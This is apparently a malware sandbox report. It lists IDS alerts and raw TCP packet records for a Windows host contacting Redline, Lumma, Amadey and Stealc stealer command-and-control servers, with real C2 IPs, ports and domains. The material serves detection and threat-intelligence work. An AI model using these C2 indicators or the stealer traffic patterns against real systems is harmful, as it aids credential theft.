2024-09-27T04:21:42.826859+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49743	89.105.223.196	29862	TCP
2024-09-27T04:21:42.834216+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49750	185.215.113.67	15206	TCP
2024-09-27T04:21:42.843407+0200	2056160	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (offensivedzvju .shop)	1	192.168.2.5	52855	1.1.1.1	53	UDP
2024-09-27T04:21:43.041333+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49743	89.105.223.196	29862	TCP
2024-09-27T04:21:43.116994+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49750	185.215.113.67	15206	TCP
2024-09-27T04:21:43.214866+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49743	89.105.223.196	29862	TCP
2024-09-27T04:21:43.341734+0200	2056161	ET MALWARE Observed Win32/Lumma Stealer Related Domain (offensivedzvju .shop in TLS SNI)	1	192.168.2.5	49770	188.114.96.3	443	TCP
2024-09-27T04:21:43.442435+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49750	185.215.113.67	15206	TCP
2024-09-27T04:21:43.796860+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49770	188.114.96.3	443	TCP
2024-09-27T04:21:43.796860+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49770	188.114.96.3	443	TCP
2024-09-27T04:21:43.849666+0200	2056158	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vozmeatillu .shop)	1	192.168.2.5	56006	1.1.1.1	53	UDP
2024-09-27T04:21:43.994728+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49743	89.105.223.196	29862	TCP
2024-09-27T04:21:44.092300+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49750	185.215.113.67	15206	TCP
2024-09-27T04:21:44.167289+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49743	89.105.223.196	29862	TCP
2024-09-27T04:21:44.339968+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49743	89.105.223.196	29862	TCP
2024-09-27T04:21:44.366238+0200	2056159	ET MALWARE Observed Win32/Lumma Stealer Related Domain (vozmeatillu .shop in TLS SNI)	1	192.168.2.5	49772	188.114.96.3	443	TCP
2024-09-27T04:21:44.485367+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49750	185.215.113.67	15206	TCP
2024-09-27T04:21:44.650067+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49743	89.105.223.196	29862	TCP
2024-09-27T04:21:44.711706+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49750	185.215.113.67	15206	TCP
2024-09-27T04:21:44.935333+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49772	188.114.96.3	443	TCP
2024-09-27T04:21:44.935333+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49772	188.114.96.3	443	TCP
2024-09-27T04:21:45.150099+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49750	185.215.113.67	15206	TCP
2024-09-27T04:21:45.367800+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49750	185.215.113.67	15206	TCP
2024-09-27T04:21:45.407138+0200	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.5	49774	185.215.113.16	80	TCP
2024-09-27T04:21:45.410461+0200	2056157	ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawzhotdog .shop in TLS SNI)	1	192.168.2.5	49775	172.67.162.108	443	TCP
2024-09-27T04:21:45.910489+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49775	172.67.162.108	443	TCP
2024-09-27T04:21:45.910489+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49775	172.67.162.108	443	TCP
2024-09-27T04:21:46.017818+0200	2056154	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fragnantbui .shop)	1	192.168.2.5	55665	1.1.1.1	53	UDP
2024-09-27T04:21:46.036192+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49774	185.215.113.16	80	TCP
2024-09-27T04:21:46.452161+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49750	185.215.113.67	15206	TCP
2024-09-27T04:21:46.529810+0200	2056155	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fragnantbui .shop in TLS SNI)	1	192.168.2.5	49777	188.114.97.3	443	TCP
2024-09-27T04:21:46.672609+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49750	185.215.113.67	15206	TCP
2024-09-27T04:21:46.892502+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49750	185.215.113.67	15206	TCP
2024-09-27T04:21:47.001883+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49777	188.114.97.3	443	TCP
2024-09-27T04:21:47.001883+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49777	188.114.97.3	443	TCP
2024-09-27T04:21:47.003766+0200	2056152	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (stogeneratmns .shop)	1	192.168.2.5	60964	1.1.1.1	53	UDP
2024-09-27T04:21:47.203326+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49750	185.215.113.67	15206	TCP
2024-09-27T04:21:47.422258+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49750	185.215.113.67	15206	TCP
2024-09-27T04:21:47.497422+0200	2056153	ET MALWARE Observed Win32/Lumma Stealer Related Domain (stogeneratmns .shop in TLS SNI)	1	192.168.2.5	49779	188.114.96.3	443	TCP
2024-09-27T04:21:47.718337+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49750	185.215.113.67	15206	TCP
2024-09-27T04:21:47.936019+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49750	185.215.113.67	15206	TCP
2024-09-27T04:21:47.966310+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49779	188.114.96.3	443	TCP
2024-09-27T04:21:47.966310+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49779	188.114.96.3	443	TCP
2024-09-27T04:21:48.022682+0200	2056150	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (reinforcenh .shop)	1	192.168.2.5	55686	1.1.1.1	53	UDP
2024-09-27T04:21:48.389197+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.5	49750	185.215.113.67	15206	TCP
2024-09-27T04:21:48.506040+0200	2056151	ET MALWARE Observed Win32/Lumma Stealer Related Domain (reinforcenh .shop in TLS SNI)	1	192.168.2.5	49780	172.67.208.139	443	TCP
2024-09-27T04:21:48.954207+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49780	172.67.208.139	443	TCP
2024-09-27T04:21:48.954207+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49780	172.67.208.139	443	TCP
2024-09-27T04:21:50.680334+0200	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.5	49785	185.215.113.16	80	TCP
2024-09-27T04:21:51.541031+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49786	104.21.2.13	443	TCP
2024-09-27T04:21:51.541031+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49786	104.21.2.13	443	TCP
2024-09-27T04:21:53.673028+0200	2856122	ETPRO MALWARE Amadey CnC Response M1	1	185.215.113.43	80	192.168.2.5	49782	TCP
2024-09-27T04:21:53.973182+0200	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.5	49782	185.215.113.43	80	TCP
2024-09-27T04:21:53.975115+0200	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.5	49791	185.215.113.37	80	TCP
2024-09-27T04:21:56.463262+0200	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.5	49796	185.215.113.37	80	TCP
2024-09-27T04:21:56.466873+0200	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.5	49782	185.215.113.43	80	TCP
2024-09-27T04:21:57.192672+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49799	185.215.113.103	80	TCP
2024-09-27T04:22:01.219170+0200	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.5	49782	185.215.113.43	80	TCP
2024-09-27T04:22:02.175425+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49812	185.215.113.16	80	TCP
2024-09-27T04:22:07.424305+0200	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.5	49782	185.215.113.43	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 27, 2024 04:21:02.398271084 CEST	49710	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:02.403297901 CEST	80	49710	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:02.403422117 CEST	49710	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:02.403605938 CEST	49710	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:02.408412933 CEST	80	49710	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:03.109658957 CEST	80	49710	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:03.109743118 CEST	49710	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:03.112271070 CEST	49710	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:03.117149115 CEST	80	49710	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:03.372349024 CEST	80	49710	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:03.372363091 CEST	80	49710	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:03.372462034 CEST	49710	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:03.426042080 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:03.438724041 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:03.438826084 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:03.440666914 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:03.445535898 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.166862965 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.166896105 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.166908979 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.166918993 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.166929960 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.166939974 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.166954041 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.166960955 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.167015076 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.167028904 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.167032957 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.167046070 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.167057037 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.167079926 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.167099953 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.171957016 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.171977997 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.172036886 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.172071934 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.290916920 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.290937901 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.290949106 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.290960073 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.290971994 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.291027069 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.291043997 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.291055918 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.291126013 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.291172028 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.291611910 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.291649103 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.291661024 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.291663885 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.291706085 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.291739941 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.291757107 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.291796923 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.291831017 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.292344093 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.292392969 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.292393923 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.292407990 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.292435884 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.292452097 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.292476892 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.292490005 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.292501926 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.292521954 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.292546034 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.293425083 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.293437958 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.293443918 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.293482065 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.296113014 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.296123028 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.296164036 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.296181917 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.299179077 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.299237013 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.549366951 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.549386024 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.549402952 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.549417019 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.549429893 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.549449921 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.549460888 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.549473047 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.549484968 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.549530029 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.549609900 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.549612999 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.549627066 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.549638033 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.549649000 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.549659967 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.549662113 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.549685955 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.549715996 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.549757957 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.549770117 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.549781084 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.549798965 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.549830914 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.549941063 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.549952030 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.549962997 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.549988031 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.550019979 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.550095081 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.550107002 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.550153017 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.550259113 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.550271988 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.550282001 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.550295115 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.550306082 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.550314903 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.550319910 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.550333977 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.550338984 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.550345898 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.550359011 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.550360918 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.550373077 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.550379992 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.550403118 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.550435066 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.550548077 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.550559998 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.550570965 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.550582886 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.550594091 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.550605059 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.550606012 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.550627947 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.550657988 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.550709009 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.550723076 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.550734043 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.550745964 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.550756931 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.550760984 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.550769091 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.550781965 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.550785065 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.550796032 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.550802946 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.550821066 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.550851107 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.551181078 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.551234007 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.551342964 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.551414967 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.554826975 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.554838896 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.554850101 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.554861069 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.554872036 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.554884911 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.554891109 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.554929972 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.554929972 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.554977894 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.554991007 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.555001974 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.555032015 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.555063963 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.555166006 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.555177927 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.555187941 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.555200100 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.555212975 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.555219889 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.555257082 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.555257082 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.555310011 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.555357933 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.555998087 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.556010008 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.556021929 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.556056976 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.556091070 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.556144953 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.556157112 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.556168079 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.556180000 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.556200981 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.556233883 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.556291103 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.556303978 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.556341887 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.557060003 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.557070971 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.557081938 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.557111979 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.557147026 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.557200909 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.557213068 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.557224035 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.557235003 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.557246923 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.557246923 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.557280064 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.557313919 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.557331085 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.557374001 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.557842970 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.557854891 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.557867050 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.557878017 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.557888985 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.557894945 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.557900906 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.557914019 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.557917118 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.557945967 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.557977915 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.557981968 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.557995081 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.558022976 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.558069944 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.559653044 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.559664965 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.559674978 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.559712887 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.559727907 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.559732914 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:04.559741020 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:04.559752941 CEST	80	49711	185.215.113.117	192.168.2.5
